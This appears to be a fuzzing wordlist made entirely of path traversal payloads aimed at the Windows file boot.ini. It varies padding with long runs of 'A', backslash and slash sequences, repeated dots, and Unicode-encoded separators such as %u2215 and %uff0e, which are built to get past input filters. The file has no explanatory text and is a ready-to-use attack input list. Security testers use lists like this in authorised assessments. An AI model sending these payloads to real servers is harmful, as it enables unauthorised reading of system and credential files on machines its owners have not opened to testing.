AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\boot.ini -.../boot.ini -.../.../boot.ini -.../.../.../boot.ini -.../.../.../.../boot.ini -.../.../.../.../.../boot.ini -.../.../.../.../.../.../boot.ini -.../.../.../.../.../.../.../boot.ini -.../.../.../.../.../.../.../.../boot.ini -...\boot.ini -...\...\boot.ini -...\...\...\boot.ini -...\...\...\...\boot.ini -...\...\...\...\...\boot.ini -...\...\...\...\...\...\boot.ini -...\...\...\...\...\...\...\boot.ini -...\...\...\...\...\...\...\...\boot.ini -..../boot.ini -..../..../boot.ini -..../..../..../boot.ini -..../..../..../..../boot.ini -..../..../..../..../..../boot.ini -..../..../..../..../..../..../boot.ini -..../..../..../..../..../..../..../boot.ini -..../..../..../..../..../..../..../..../boot.ini -....\boot.ini -....\....\boot.ini -....\....\....\boot.ini -....\....\....\....\boot.ini -....\....\....\....\....\boot.ini -....\....\....\....\....\....\boot.ini -....\....\....\....\....\....\....\boot.ini -....\....\....\....\....\....\....\....\boot.ini -........................................................................../boot.ini -........................................................................../../boot.ini -........................................................................../../../boot.ini -........................................................................../../../../boot.ini -........................................................................../../../../../boot.ini -........................................................................../../../../../../boot.ini -........................................................................../../../../../../../boot.ini -........................................................................../../../../../../../../boot.ini -..........................................................................\boot.ini -..........................................................................\..\boot.ini -..........................................................................\..\..\boot.ini -..........................................................................\..\..\..\boot.ini -..........................................................................\..\..\..\..\boot.ini -..........................................................................\..\..\..\..\..\boot.ini -..........................................................................\..\..\..\..\..\..\boot.ini -..........................................................................\..\..\..\..\..\..\..\boot.ini -..%u2215boot.ini -..%u2215..%u2215boot.ini -..%u2215..%u2215..%u2215boot.ini -..%u2215..%u2215..%u2215..%u2215boot.ini -..%u2215..%u2215..%u2215..%u2215..%u2215boot.ini -..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215boot.ini -..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215boot.ini -..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215boot.ini -%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -..%u2216boot.ini -..%u2216..%u2216boot.ini -..%u2216..%u2216..%u2216boot.ini -..%u2216..%u2216..%u2216..%u2216boot.ini -..%u2216..%u2216..%u2216..%u2216..%u2216boot.ini -..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216boot.ini -..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216boot.ini -..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216boot.ini -..%uEFC8boot.ini -..%uEFC8..%uEFC8boot.ini -..%uEFC8..%uEFC8..%uEFC8boot.ini -..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -..%uF025boot.ini -..%uF025..%uF025boot.ini -..%uF025..%uF025..%uF025boot.ini -..%uF025..%uF025..%uF025..%uF025boot.ini -..%uF025..%uF025..%uF025..%uF025..%uF025boot.ini -..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025boot.ini -..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025boot.ini -..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025boot.ini -%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini 